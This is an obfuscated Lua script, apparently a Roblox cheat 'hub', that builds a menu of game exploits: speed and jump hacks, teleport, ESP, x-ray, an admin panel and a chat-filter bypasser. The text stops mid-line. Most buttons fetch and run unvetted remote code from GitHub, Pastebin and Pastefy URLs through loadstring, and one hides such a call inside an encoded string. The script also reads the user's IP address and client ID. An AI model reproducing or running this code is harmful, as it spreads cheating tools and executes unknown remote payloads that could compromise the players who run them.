--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.5) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v8,v9)local v23={};for v92=1, #v8 do v6(v23,v0(v4(v1(v2(v8,v92,v92 + 1 )),v1(v2(v9,1 + ((v92-1)% #v9) ,1 + ((v92-1)% #v9) + 1 )))%256 ));end return v5(v23);end local v10=loadstring(game:HttpGet("https://raw.githubusercontent.com/shlexware/Orion/main/source"))();local v11=game.Players.LocalPlayer;local v12=tostring(game:HttpGet("https://api64.ipify.org"));local v13=v10:MakeWindow({[v7("\240\201\55\255","\190\168\90\154\45\183\209\225")]="TopikHub' FE Universal",[v7("\5\63\66\122\230\63\51\75\118\195\32","\77\86\38\31\182")]=false,[v7("\212\249\11\53\81\191\2\225\241\26","\135\152\125\80\18\208\108")]=true,[v7("\244\252\24\1\63\254\5\210\201","\189\146\108\115\80\170\96\170")]=v7("\231\58\163\139\194\13\234\168\213\95\193\161\129\43\236\168\200\20\174\144\212\29\163\240\155","\161\127\131\216")});plr=game.Players.LocalPlayer;local v15=v13:MakeTab({[v7("\251\183\179\160","\181\214\222\197")]=v7("\203\197\15\39\156\156\240\208\5","\158\182\106\85\188\213"),[v7("\170\190\63\32","\227\221\80\78\148\103\217\133")]="rbxassetid://4384401919"});local v16=identifyexecutor();v15:AddLabel(v7("\209\244\165\147\59\172\35\181\243\183\142\50\247\122","\149\157\214\227\87\205\90")   .. plr.DisplayName );v15:AddLabel(v7("\197\53\244\121\157\244\34\227\32\200","\128\77\145\26\232")   .. v16 );v15:AddLabel(v7("\38\249\252\80\199\19\67\167\73\170","\115\138\153\34\169\114\46\194")   .. plr.Name );v15:AddLabel(v7("\215\66\143\202\227\79\152\133\215\70\137\159\182","\150\33\236\165")   .. plr.AccountAge   .. v7("\106\139\239\68\196","\74\207\142\61\183\231\40") );local v17=v15:AddLabel(v7("\97\32\62\110\20\26\31\38\20","\52\83\91\28")   .. game.Players.LocalPlayer.UserId );v15:AddLabel(v7("\148\36\174\77\17\163\104\142\108\87\159\31\142\108\86\237\104","\215\72\199\40\127")   .. game:GetService(v7("\229\215\13\59\118\253\86\206\193\28\25\107\207\95\197\195\28\25\125","\183\181\117\122\24\156\58")):GetClientId() );local v18=v15:AddLabel(v7("\171\230\3\243\249\200\254\2\245\178\138\255\30\228\253\134\170\8\245\254\135\253\74\228\253\200\249\2\255\229\200\227\26","\232\138\106\144\146"));v15:AddButton({[v7("\249\213\17\7","\183\180\124\98\216\110\223\25")]=v7("\17\180\220\177\205\137\101","\66\220\179\198\237\192\53"),[v7("\17\166\230\226\34\51\164\225","\82\199\138\142\64")]=function()v18:Set(v7("\61\201\220","\116\153\230\44")   .. v12 );end});v15:AddButton({[v7("\125\214\201\166","\51\183\164\195\109\114")]=v7("\211\212\65\177\235\119\55","\155\189\37\212\203\62\103\16"),[v7("\192\162\23\224\199\18\212\64","\131\195\123\140\165\115\183\43")]=function()v18:Set(v7("\209\62\162\127\56\178\38\163\121\115\240\39\191\104\60\252\114\169\121\63\253\37\235\104\60\178\33\163\115\36\178\59\187","\146\82\203\28\83"));end});v15:AddButton({[v7("\16\15\89\122","\94\110\52\31\235")]=v7("\140\187\16\4\240\140\184\9\24\190\187\244\41\57\248\135\131\41\57\249","\207\212\96\125\208"),[v7("\19\211\133\143\50\211\138\136","\80\178\233\227")]=function()local v24=0 -0 ;local v25;while true do if (v24==(0 -0)) then v25=0;while true do if ((557 -(279 + 278))==v25) then setclipboard(game:GetService(v7("\65\118\87\225\20\221\81\77\103\125\76\211\41\217\79\66\122\119\74","\19\20\47\160\122\188\61\52")):GetClientId());v10:MakeNotification({[v7("\199\47\91\195","\137\78\54\166\32\125")]=v7("\221\12\156\85\36\33\7","\158\99\236\60\65\69\38"),[v7("\52\6\189\247\143\183\79","\119\105\211\131\234\217\59\192")]=v7("\102\128","\78\186\151\199\68\164\187\111"),[v7("\62\54\52\87\85","\119\91\85\48\48\107")]="rbxassetid://4483345998",[v7("\193\183\92\130","\149\222\49\231\223\84\158\96")]=5 + 0 });break;end end break;end end end});local v19=v13:MakeTab({[v7("\33\79\200\160","\111\46\165\197\33\144\93")]=v7("\224\22\179\84\213\8\242\96\223\30\187\75\217\31\160","\176\122\210\45"),[v7("\244\41\182\248","\189\74\217\150")]="rbxassetid://4384400812"});v19:AddSlider({[v7("\202\192\57\86","\132\161\84\51\189\139\17\154")]=v7("\76\236\22\225\48\4\107\232\31\238","\27\141\122\138\16\87"),[v7("\5\137\72","\72\224\38\212\59\121")]=1108 -(1007 + 101) ,[v7("\223\122\79","\146\27\55\161\22\94\142\54")]=934 -(42 + 692) ,[v7("\35\227\50\44\149\25\19","\103\134\84\77\224\117")]=582 -(470 + 92) ,[v7("\140\186\201\236\89","\207\213\165\131\43\98")]=Color3.fromRGB(0 + 0 ,7 + 72 ,2231 -(33 + 1962) ),[v7("\94\237\207\102\161\115\117\121\247","\23\131\172\20\196\30\16")]=2 -1 ,[v7("\114\197\221\161\119\244\69\201\212","\36\164\177\212\18\186")]=v7("\236\190\170\161\180\60\254\186\162","\155\223\198\202\199\76"),[v7("\160\166\62\204\14\130\164\57","\227\199\82\160\108")]=function(v20)plr.Character.Humanoid.WalkSpeed=v20;end});v19:AddSlider({[v7("\114\32\17\206","\60\65\124\171\131")]=v7("\121\192\232\66\86\99\218\242\87\4","\51\181\133\50\118"),[v7("\150\181\116","\219\220\26\182")]=0 + 0 ,[v7("\29\239\152","\80\142\224\34\86\185\78")]=200,[v7("\137\202\245\22\2\36\185","\205\175\147\119\119\72")]=1814 -(751 + 1013) ,[v7("\139\117\169\228\197","\200\26\197\139\183\189\138\175")]=Color3.fromRGB(1680 -(1204 + 476) ,694 -(540 + 75) ,507 -(147 + 124) ),[v7("\120\119\210\82\12\84\84\119\197","\49\25\177\32\105\57")]=1 -0 ,[v7("\63\33\138\101\12\14\135\125\12","\105\64\230\16")]=v7("\64\85\76\81\90\79\86\68\88","\42\32\33\33"),[v7("\2\236\78\243\137\32\238\73","\65\141\34\159\235")]=function(v20)plr.Character.Humanoid.JumpPower=v20;end});v19:AddTextbox({[v7("\6\15\242\125","\72\110\159\24\30\218\181")]=v7("\192\237\245\222\32\49\108\133\240\224\230\144\14\16\108\248\192\233\253\213\41\32\63\185\231\224\189","\131\133\148\176\71\84\76\208"),[v7("\38\95\17\20\23\86\3","\98\58\119\117")]=v7("\188\179","\138\138\169\92\161\68"),[v7("\11\82\71\97\127\64\44\86\79\101\94\72\45","\95\55\63\21\59\41")]=true,[v7("\252\94\119\174\221\94\120\169","\191\63\27\194")]=function(v20)plr.UserId=v20;end});v19:AddButton({[v7("\53\127\200\22","\123\30\165\115\199\52\162")]=v7("\51\142\175\129\48\149\164\209","\122\224\201\161"),[v7("\1\7\212\250\112\21\192\84","\66\102\184\150\18\116\163\63")]=function()game:GetService(v7("\202\233\93\168\254\241\234\77\174\228\250\232\78\179\212\250","\159\154\56\218\183")).JumpRequest:connect(function()game:GetService(v7("\196\229\5\88\67\206\29","\148\137\100\33\38\188\110\142")).LocalPlayer.Character:FindFirstChildOfClass(v7("\160\3\13\16\4\254\129\18","\232\118\96\113\106\145")):ChangeState(v7("\16\96\20\223\137\30\43","\90\21\121\175\224\112\76"));end);end});v19:AddButton({[v7("\39\65\135\36","\105\32\234\65\134\139\171\101")]=v7("\97\80\174\16\71","\51\53\221\117"),[v7("\119\48\221\197\29\1\87\58","\52\81\177\169\127\96")]=function()game.Players.LocalPlayer.Character.Humanoid.Health=0 -0 ;end});v19:AddButton({[v7("\40\236\236\81","\102\141\129\52\202\189\127\28")]=v7("\246\31\213\136\66\193\57\247\31\205\145\78\221","\164\122\191\231\43\175\25"),[v7("\60\138\1\136\121\30\136\6","\127\235\109\228\27")]=function()game:GetService(v7("\159\124\137\22\187\118\151\7\152\124\151\5\162\122\128","\203\25\229\115")):Teleport(game.PlaceId,game:GetService(v7("\108\16\139\24\15\147\79","\60\124\234\97\106\225")).LocalPlayer);end});local v21=v13:MakeTab({[v7("\35\235\212\70","\109\138\185\35\193\99")]=v7("\246\85\170\194\198\73\176\213\207\27\138\192\198\86\176","\163\59\195\180"),[v7("\215\57\60\215","\158\90\83\185\199\140\95")]="rbxassetid://4483345998",[v7("\41\232\26\4\16\239\18\38\23\246\6","\121\154\127\105")]=false});local v22=v21:AddSection({[v7("\85\184\121\183","\27\217\20\210\64\126")]=v7("\182\17\65\39\134\13\91\48\143\69","\227\127\40\81")});v21:AddButton({[v7("\213\175\194\24","\155\206\175\125")]=v7("\8\230\235\146\109\4\174\171\133\12\103\197\254\217\73\102","\79\131\159\178\44"),[v7("\169\184\210\53\136\184\221\50","\234\217\190\89")]=function()loadstring(game:HttpGet("https://raw.githubusercontent.com/eeeerrrrf3/main/main/Universalallgame/get%20ak47"))();end});v21:AddButton({[v7("\207\86\25\226","\129\55\116\135\44\57\124\155")]=v7("\22\95\80\70\254\240\62\87\70\9\196\191\121\124\69\13\217\182","\81\58\36\102\188\159"),[v7("\225\228\197\232\192\228\202\239","\162\133\169\132")]=function()local v30=0 + 0 ;local v31;while true do if (v30==(297 -(268 + 29))) then v31=0 -0 ;while true do if (v31==0) then _G.boomboxb=game:GetObjects("rbxassetid://740618400")[1];_G.boomboxb.Parent=game:GetService(v7("\39\129\12\7\186\227\4","\119\237\109\126\223\145")).LocalPlayer.Backpack;v31=535 -(257 + 277) ;end if (v31==(1 + 0)) then loadstring(_G.boomboxb.Client.Source)();loadstring(_G.boomboxb.Server.Source)();break;end end break;end end end});v21:AddButton({[v7("\212\11\234\43","\154\106\135\78\213")]=v7("\235\43\228\109\34\219\33\226\41\81\132\8\241\38\20\133","\172\78\144\77\113"),[v7("\133\25\137\141\56\223\169\173","\198\120\229\225\90\190\202")]=function()loadstring(game:HttpGet("https://raw.githubusercontent.com/eeeerrrrf3/main/main/Universalallgame/Sword"))();end});v21:AddButton({[v7("\27\221\228\230","\85\188\137\131\237\100\164\236")]=v7("\223\166\170\23\219\171\191\94\246\176\191\64\184\235\152\86\243\166\247","\152\195\222\55"),[v7("\151\113\74\48\178\94\234\203","\212\16\38\92\208\63\137\160")]=function()loadstring(game:HttpGet("https://raw.githubusercontent.com/eeeerrrrf3/main/main/Universalallgame/chainsaw",true))();end});v21:AddButton({[v7("\197\52\7\192","\139\85\106\165\224")]=v7("\94\141\217\8\211\113\135\217\79\245\119\200\133\110\225\114\141\132","\25\232\173\40\128"),[v7("\55\222\19\181\74\131\23\212","\116\191\127\217\40\226")]=function()loadstring(game:HttpGet("https://raw.githubusercontent.com/eeeerrrrf3/main/main/Universalallgame/Shotgun"))();end});v21:AddButton({[v7("\58\209\81\50","\116\176\60\87\81\156\194")]=v7("\14\69\230\77\236\15\218\40\78\243","\73\32\146\109\167\110\174"),[v7("\241\87\69\57\162\211\85\66","\178\54\41\85\192")]=function()loadstring(game:HttpGet("https://raw.githubusercontent.com/eeeerrrrf3/main/main/Universalallgame/Getkatana"))();end});v21:AddButton({[v7("\236\215\60\32","\162\182\81\69")]=v7("\134\226\201\254\39\33\225\211\210\177\31","\193\135\189\222\115\113"),[v7("\18\181\1\209\254\69\181\58","\81\212\109\189\156\36\214")]=function()local v32=0 + 0 ;while true do if (v32==1) then tool.RequiresHandle=false;tool.Name=v7("\44\70","\120\22\83\83");v32=2;end if (v32==(881 -(182 + 699))) then mouse=game.Players.LocalPlayer:GetMouse();tool=Instance.new(v7("\197\27\245\236","\145\116\154\128\130"));v32=586 -(366 + 219) ;end if (v32==(1659 -(987 + 670))) then tool.Activated:connect(function()local v112=0 -0 ;local v113;while true do if (v112==(332 -(39 + 292))) then game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=v113;break;end if (0==v112) then v113=mouse.Hit + Vector3.new(0 -0 ,1.5 + 1 ,0 + 0 ) ;v113=CFrame.new(v113.X,v113.Y,v113.Z);v112=1586 -(1073 + 512) ;end end end);tool.Parent=game.Players.LocalPlayer.Backpack;break;end end end});v21:AddButton({[v7("\86\234\229\141","\24\139\136\232")]="Get garry's mod Items",[v7("\119\60\114\252\251\212\202\227","\52\93\30\144\153\181\169\136")]=function()loadstring(game:HttpGet("https://raw.githubusercontent.com/eeeerrrrf3/main/main/Universalallgame/garismoditems"))();end});local v21=v13:MakeTab({[v7("\145\190\220\164","\223\223\177\193")]=v7("\57\16\17\22\163\30\13\25\12\230\45\8\25\20\167\30","\108\126\120\96\198"),[v7("\53\234\20\244","\124\137\123\154\208\54\220\122")]="rbxassetid://4483345998",[v7("\223\222\210\238\230\217\218\204\225\192\206","\143\172\183\131")]=false});local v22=v21:AddSection({[v7("\60\160\116\74","\114\193\25\47\217\53\48")]=v7("\69\134\140\177\208\98\155\132\171\143","\16\232\229\199\181")});v21:AddButton({[v7("\140\227\34\10","\194\130\79\111\163\207\183")]=v7("\28\131\209\18\158\59\139\210\18\254\24\139\221\87\255","\94\234\182\50\214"),[v7("\48\183\168\233\17\183\167\238","\115\214\196\133")]=function()loadstring(game:HttpGet("https://raw.githubusercontent.com/eeeerrrrf3/main/main/Universalallgame/Big%20Haed"))();end});v21:AddButton({[v7("\172\130\13\179","\226\227\96\214\220")]=v7("\55\90\85\102\236\4\53\28\14\20\121\113\253\86\21\24\14\82\28\88\232\2\53","\98\52\60\16\137\118\70\125"),[v7("\196\236\68\55\229\236\75\48","\135\141\40\91")]=function()loadstring(game:HttpGet("https://raw.githubusercontent.com/eeeerrrrf3/main/main/Universalallgame/eat%20hat"))();end});v21:AddButton({[v7("\203\28\141\114","\133\125\224\23")]=v7("\111\39\219\68\228\121\47\208","\59\70\183\40\201"),[v7("\215\162\124\94\65\128\251\141","\148\195\16\50\35\225\152\230")]=function()local v33=1059 -(74 + 985) ;local v34;local v35;local v36;while true do if (v33==(594 -(134 + 460))) then v34=game:GetService(v7("\238\165\141\21\67\68\60","\190\201\236\108\38\54\79")).LocalPlayer;v35=v34.Character;v36=v35:FindFirstChildOfClass(v7("\132\107\86\189\162\113\82\184","\204\30\59\220"));_G[v7("\251\232","\137\133\164\183\31")]=function()for v114,v115 in pairs(v35:GetDescendants()) do if v115:IsA(v7("\139\71\59\118\79\253\241\189","\201\38\72\19\31\156\131")) then if ((v115.Name==v7("\102\89\74\2\60\75","\46\56\36\102\80")) or (v115.Name==v7("\232\123\214\13","\160\30\183\105\158"))) then if v35.Head:FindFirstChild(v7("\19\152\43\18\176\219\209\48\185\43\15\188","\92\234\66\117\217\181\176")) then v35.Head.OriginalSize:Destroy();end else local v121=0 -0 ;while true do if (v121==(1 + 0)) then if v115:FindFirstChild(v7("\48\232\79\244\42\3\206\79\242\63\34\253\79\236\46\37\231\94\229","\113\158\46\128\75")) then v115:FindFirstChild(v7("\54\47\198\66\72\16\68\22\43\211\101\74\3\120\18\13\222\70\76","\119\89\167\54\41\98\20")):Destroy();end break;end if (v121==(0 -0)) then local v122=0 -0 ;while true do if (v122==(1691 -(546 + 1145))) then for v123,v124 in pairs(v115:GetDescendants()) do if v124:IsA(v7("\23\26\26\82\191\217\48\51\0\26","\86\110\110\51\220\177\93")) then if v124:FindFirstChild(v7("\162\207\117\142\28\185\16\129\237\115\154\28\163\24\130\211","\237\189\28\233\117\215\113")) then v124.OriginalPosition:Destroy();end end end v115:FindFirstChild(v7("\99\218\71\48\212\66\201\66\4\212\86\205","\44\168\46\87\189")):Destroy();v122=1 + 0 ;end if (1==v122) then v121=4 -3 ;break;end end end end end end end end;v33=1 + 0 ;end if ((11 -7)==v33) then rm();wait(0.5);v36:FindFirstChild(v7("\197\30\80\194\4\37\247\5\92\232\35\33\235\20","\135\113\52\187\64\64")):Destroy();wait(1 + 0 );v33=1701 -(577 + 1119) ;end if (v33==(3 + 0)) then rm();wait(0.5 + 0 );v36:FindFirstChild(v7("\12\41\55\68\130\213\39\58\46\0\94\180\208\38","\78\70\83\61\213\188\67")):Destroy();wait(3 -2 );v33=4;end if (v33==2) then local v111=0 + 0 ;while true do if (v111==(1707 -(58 + 1649))) then rm();wait(0.5 + 0 );v111=1316 -(427 + 888) ;end if (v111==(4 -2)) then v33=5 -2 ;break;end if (v111==(700 -(581 + 118))) then v36:FindFirstChild(v7("\57\175\83\213\208\190\201\28\168\67\255\251\186\204\30","\123\192\55\172\152\219\160")):Destroy();wait(1 -0 );v111=2 + 0 ;end end end if (v33==1) then rm();wait(0.5 -0 );v36:FindFirstChild(v7("\30\169\13\84\244\238\252\62\51\180\29\68\203\242\192\45\61\170\12","\92\198\105\45\164\156\147\78")):Destroy();wait(2 -1 );v33=1 + 1 ;end if (v33==(22 -17)) then rm();wait(0.5 -0 );v36:FindFirstChild(v7("\198\51\138\188\199\237\55\135\189","\142\86\235\216\148")):Destroy();wait(1);break;end end end});v21:AddButton({[v7("\112\52\241\168","\62\85\156\205\164")]=v7("\239\49\24\245\85\220\103\10\226\70\199\55\13\161\28\232\38\18\228\29","\174\71\121\129\52"),[v7("\59\226\164\121\5\246\178\237","\120\131\200\21\103\151\209\134")]=function()loadstring(game:HttpGet("https://raw.githubusercontent.com/eeeerrrrf3/main/main/Universalallgame/Avatarscript"))();end});local v21=v13:MakeTab({[v7("\85\37\179\24","\27\68\222\125\98\151\39")]=v7("\117\229\71\55\212\225\186\13\76\171\104\4\145\192\170\30\73\251\90","\32\139\46\65\177\147\201\108"),[v7("\226\233\51\170","\171\138\92\196\114\103\101")]="rbxassetid://4483345998",[v7("\178\98\89\31\250\181\143\95\82\30\234","\226\16\60\114\147\192")]=false});local v22=v21:AddSection({[v7("\132\71\170\65","\202\38\199\36\80\98\98")]=v7("\72\190\185\193\116\16\32\190\113\234","\29\208\208\183\17\98\83\223")});v21:AddButton({[v7("\154\44\226\17","\212\77\143\116\62\35")]=v7("\226\223\25\214\77\242\209\25\214","\160\190\117\186\109"),[v7("\85\229\6\161\220\119\231\1","\22\132\106\205\190")]=function()loadstring(game:HttpGet("https://raw.githubusercontent.com/eeeerrrrf3/main/main/Universalallgame/Ball%20Roll"))();end});v21:AddButton({[v7("\219\254\88\116","\149\159\53\17\216")]=v7("\53\201\80\250\166\195\123\20\133\121\247\187\196\114\22\215","\115\165\63\155\210\170\21"),[v7("\213\84\212\116\228\137\136\253","\150\53\184\24\134\232\235")]=function()loadstring(game:HttpGet("https://raw.githubusercontent.com/sinret/rbxscript.com-scripts-reuploads-/main/fffe",true))();end});v21:AddButton({[v7("\245\35\10\10","\187\66\103\111\158\86")]=v7("\53\219\16\193\4\34\246\89\135\98\6\197\28\134","\103\174\121\175\36"),[v7("\159\112\228\135\189\21\192\183","\220\17\136\235\223\116\163")]=function()loadstring(game:HttpGet("https://raw.githubusercontent.com/eeeerrrrf3/main/main/Universalallgame/Ruin%20EX"))();end});v21:AddButton({[v7("\62\219\8\21","\112\186\101\112\189")]=v7("\60\240\61\0\153\49\216\252\91\221\51\0\153\49\216\252","\123\159\82\100\185\114\183\140"),[v7("\122\63\73\68\91\63\70\67","\57\94\37\40")]=function()loadstring(game:HttpGet("https://rawscripts.net/raw/Universal-Script-FE-Good-Cop-Bad-Cop-5903"))();end});v21:AddButton({[v7("\128\29\166\248","\206\124\203\157\140\148\50\107")]=v7("\150\207\239\166\129\161\220","\196\174\153\199\230"),[v7("\45\214\160\213\29\15\212\167","\110\183\204\185\127")]=function()loadstring(game:HttpGet("https://raw.githubusercontent.com/sinret/rbxscript.com-scripts-reuploads-/main/univ54",true))();end});v21:AddButton({[v7("\109\202\33\240","\35\171\76\149")]=v7("\5\195\70\13\223\51\209","\70\162\34\120\188"),[v7("\95\91\192\201\69\125\89\199","\28\58\172\165\39")]=function()loadstring(game:HttpGetAsync("https://pastebin.com/raw/jfryBKds"))();end});v21:AddButton({[v7("\221\26\51\76","\147\123\94\41\150\209\171\41")]=v7("\176\73\179\49\235\32\187\170\182\27","\224\40\193\90\132\85\201\138"),[v7("\101\185\234\225\29\71\187\237","\38\216\134\141\127")]=function()loadstring(game:HttpGet("https://pastefy.ga/Ucu1UkxZ/raw",true))();end});v21:AddButton({[v7("\168\33\55\23","\230\64\90\114\168\149\78")]=v7("\105\122\250\117\64\229\37\180\7\109\163","\39\27\151\16\44\128\86\199"),[v7("\238\175\212\210\112\14\206\165","\173\206\184\190\18\111")]=function()loadstring(game:HttpGet("https://raw.githubusercontent.com/eeeerrrrf3/main/main/Universalallgame/Nameless",true))();end});v21:AddButton({[v7("\111\245\91\60","\33\148\54\89\157")]="",[v7("\47\18\32\35\221\6\175\7","\108\115\76\79\191\103\204")]=function()loadstring(game:HttpGet("https://pastefy.ga/Ucu1UkxZ/raw",true))();end});v21:AddButton({[v7("\175\238\160\201","\225\143\205\172\217\199\195\30")]=v7("\70\230\76\170\37\123\237\69\188\39\97","\18\131\32\207\78"),[v7("\216\88\236\3\27\0\61\240","\155\57\128\111\121\97\94")]=function()loadstring(game:HttpGet("https://pastebin.com/raw/ZCuzD82x"))();end});v21:AddButton({[v7("\199\166\124\57","\137\199\17\92\216\125")]=v7("\183\25\232\87\239","\228\119\137\60\138\216\92\193"),[v7("\211\48\203\189\183\61\190\180","\144\81\167\209\213\92\221\223")]=function()loadstring(game:HttpGet("https://pastefy.ga/tWBTcE4R/raw",true))();end});v21:AddButton({[v7("\150\59\10\230","\216\90\103\131\107\49")]="",[v7("\54\52\58\176\58\41\38\30","\117\85\86\220\88\72\69")]=function()print(v7("\193\245\20\69\231\230\57\149\209\229\19\66\237\236","\163\128\96\49\136\136\25\229"));end});v21:AddButton({[v7("\107\24\8\250","\37\121\101\159\21")]="",[v7("\54\192\234\15\160\205\85\30","\117\161\134\99\194\172\54")]=function()print(v7("\120\167\224\78\88\85\58\162\230\95\68\72\127\182","\26\210\148\58\55\59"));end});local v21=v13:MakeTab({[v7("\244\34\176\85","\186\67\221\48\61\229\195")]=v7("\115\30\227\18\168\228\85\17\230\68\158\245\84\25\250\16","\38\112\138\100\205\150"),[v7("\237\55\143\31","\164\84\224\113\229\79\64")]="rbxassetid://4483345998",[v7("\147\237\48\25\166\182\242\26\26\163\186","\195\159\85\116\207")]=false});local v22=v21:AddSection({[v7("\154\122\124\86","\212\27\17\51\236\150")]=v7("\14\85\58\214\62\73\32\193\55\1","\91\59\83\160")});v21:AddButton({[v7("\36\241\197\56","\106\144\168\93\145")]=v7("\104\187\143","\45\232\223\64\57\156"),[v7("\128\163\79\88\75\113\51\168","\195\194\35\52\41\16\80")]=function()loadstring(game:HttpGet("https://raw.githubusercontent.com/eeeerrrrf3/main/main/Universalallgame/ESP"))();end});v21:AddButton({[v7("\221\122\166\121","\147\27\203\28\53\149\58")]=v7("\226\65\52","\164\45\77\100\105\25\92\161"),[v7("\164\36\60\12\202\187\132\46","\231\69\80\96\168\218")]=function()loadstring("\108\111\97\100\115\116\114\105\110\103\40\103\97\109\101\58\72\116\116\112\71\101\116\40\40\39\104\116\116\112\115\58\47\47\103\105\115\116\46\103\105\116\104\117\98\117\115\101\114\99\111\110\116\101\110\116\46\99\111\109\47\109\101\111\122\111\110\101\89\84\47\98\102\48\51\55\100\102\102\57\102\48\97\55\48\48\49\55\51\48\52\100\100\100\54\55\102\100\99\100\51\55\48\47\114\97\119\47\101\49\52\101\55\52\102\52\50\53\98\48\54\48\100\102\53\50\51\51\52\51\99\102\51\48\98\55\56\55\48\55\52\101\98\51\99\53\100\50\47\97\114\99\101\117\115\37\50\53\50\48\120\37\50\53\50\48\102\108\121\37\50\53\50\48\50\37\50\53\50\48\111\98\102\108\117\99\97\116\111\114\39\41\44\116\114\117\101\41\41\40\41\10\10")();end});v21:AddButton({[v7("\192\127\26\125","\142\30\119\24\191")]=v7("\206\188\15\169\185\175\136\3\174\178\227","\143\216\98\192\215"),[v7("\116\229\124\208\85\229\115\215","\55\132\16\188")]=function()loadstring(game:HttpGet("https://raw.githubusercontent.com/eeeerrrrf3/main/main/Universalallgame/Admin%20panel"))();end});v21:AddButton({[v7("\8\191\196\74","\70\222\169\47\206\137\131\205")]=v7("\230\104\107\222\165\158\109\124\150","\190\69\57\191\220"),[v7("\157\161\212\184\167\0\189\171","\222\192\184\212\197\97")]=function()loadstring(game:HttpGet("https://raw.githubusercontent.com/eeeerrrrf3/main/main/Universalallgame/Xrey"))();end});v21:AddButton({[v7("\247\224\18\195","\185\129\127\166\38\214\105\214")]=v7("\60\129\199\90\133\234\211","\123\228\179\122\198\139\161\118"),[v7("\114\240\61\225\174\6\176\90","\49\145\81\141\204\103\211")]=function()loadstring(game:HttpGet("https://pastebin.com/raw/1iCSMS90"))();end});v21:AddButton({[v7("\15\3\0\242","\65\98\109\151\193\49\113")]=v7("\154\240\245\183\89\171","\216\132\154\216\53"),[v7("\193\58\241\182\224\58\254\177","\130\91\157\218")]=function()loadstring(game:HttpGet("https://raw.githubusercontent.com/sombolian/scripts/main/Pop_It_Trading"))();end});v21:AddButton({[v7("\0\183\40\50","\78\214\69\87\157\230\232")]=v7("\160\24\219\193\204\55\233\227","\225\118\175\168"),[v7("\234\15\228\32\125\117\129\161","\169\110\136\76\31\20\226\202")]=function()loadstring(game:HttpGet("https://raw.githubusercontent.com/eeeerrrrf3/main/main/Universalallgame/Antiafk"))();end});v21:AddButton({[v7("\226\218\199\137","\172\187\170\236\91\208")]=v7("\33\84\205\51\149\252\62\18\93\223\52\208\204","\98\60\172\71\181\190\71"),[v7("\238\12\229\21\59\17\233\68","\173\109\137\121\89\112\138\47")]=function()loadstring(game:HttpGet("https://raw.githubusercontent.com/yenil140/ChatBypasser/main/Universal"))();end});v21:AddButton({[v7("\215\83\176\211","\153\50\221\182\78\230\164\222")]=v7("\135\136\192\55\115\183\205\194\44\122\176\128\209\99\101\169\132\208\38\100","\197\237\180\67\22"),[v7("\56\236\56\192\217\120\8\16","\123\141\84\172\187\25\107")]=function()if  not game:IsLoaded() then game.Loaded:Wait();end local v37=game.Players.LocalPlayer;local v38=v37:GetMouse();local v39=game:GetService(v7("\2\77\179\144\91\43\26\34\74\133\135\96\51\3\52\91","\87\62\214\226\18\69\106"));local function v40(v41)return string.format("rbxthumb://type=Asset&id=%s&w=420&h=420",tonumber(v41));end local v42=game.CoreGui:WaitForChild(v7("\208\118\83\58\237\97\118\35\235","\130\25\49\86"));local v43=v42:WaitForChild(v7("\244\73\75\46\251\67\192\95\108\50\251\72\203\72","\167\44\63\90\146\45")):WaitForChild(v7("\151\164\193\167\176\184\58\8\151\169\220\182\181\178","\196\193\181\211\217\214\93\123"));local v44=v43:WaitForChild(v7("\253\163\92\168\170\223\168\70\188\128\222\163\64","\176\198\50\221\233")):WaitForChild(v7("\196\58\27\75\249\9\5\145\215\55\21\94\223\5\18","\148\91\124\46\175\96\96\230")):WaitForChild(v7("\102\131\218\198\96\139\216\212","\54\226\189\163")):WaitForChild(v7("\107\174\32\210\109\166\34\192\114\161\41\210\73\137\53\214\86\170","\59\207\71\183"));local v45=v42:WaitForChild(v7("\48\244\1\50\16\205","\99\155\116\92\116\190\225")):WaitForChild(v7("\96\70\84\145\55\237\104\94\72\86\131\63\219\68\67\71\92","\54\41\56\228\90\136\43"));local v46=v44:FindFirstChild(v7("\50\89\33\44","\98\56\70\73\151\71\223\127"));if  not v46 then local v103=0 + 0 ;local v104;while true do if (v103==(3 -2)) then repeat task.wait();until v46 break;end if (v103==(0 -0)) then v104=nil;v104=v44.ChildAdded:Connect(function(v116)if (v116.Name==v7("\227\86\168\61","\179\55\207\88\113\105\152")) then local v120=0;while true do if ((0 -0)==v120) then v46=v116;v104:Disconnect();break;end end end end);v103=1;end end end local v47=v46:WaitForChild(v7("\3\65\230\164\63\48\104\248\176\63\48","\85\46\138\209\82"));v47:WaitForChild(v7("\97\199\212\35\93\162","\50\171\189\71\56\208\103")):Destroy();local v48=Instance.new(v7("\108\249\184\187\221","\42\139\217\214\184"));v48.AnchorPoint=Vector2.new(4 -3 ,913.5 -(79 + 834) );v48.BackgroundTransparency=1420 -(971 + 448) ;v48.Position=UDim2.new(1 + 0 ,100 -(50 + 50) ,536.5 -(304 + 232) ,0 -0 );v48.Size=UDim2.new(0.6 -0 ,0 -0 ,353 -(217 + 135) ,859 -(132 + 727) );v48.Name=v7("\122\21\6\173\76\11","\41\121\111\201");local v54=Instance.new(v7("\128\246\247\141\160\133\250\244\143\169","\201\155\150\234\197"),v48);v54.AnchorPoint=Vector2.new(0.5 -0 ,227.5 -(179 + 48) );v54.BackgroundTransparency=1276 -(1058 + 217) ;v54.Position=UDim2.new(0.5 -0 ,1302 -(717 + 585) ,0.5 + 0 ,0 + 0 );v54.Size=UDim2.new(0.95 -0 ,1375 -(142 + 1233) ,0.7 -0 ,0 -0 );v54.ImageColor3=Color3.fromRGB(64 + 14 ,84,208 -112 );v54.Image=v40(8668057520 -1912400156 );v54.ScaleType=Enum.ScaleType.Slice;v54.SliceCenter=Rect.new(310 -100 ,1512 -(877 + 425) ,1025 -815 ,952 -742 );local v64=v54:Clone();v64.AnchorPoint=Vector2.new(0,0 + 0 );v64.ImageColor3=Color3.fromRGB(1270 -(771 + 499) ,162,128 + 127 );v64.Position=UDim2.new(0 + 0 ,179 -(31 + 148) ,796 -(82 + 714) ,0 + 0 );v64.Size=UDim2.new(1 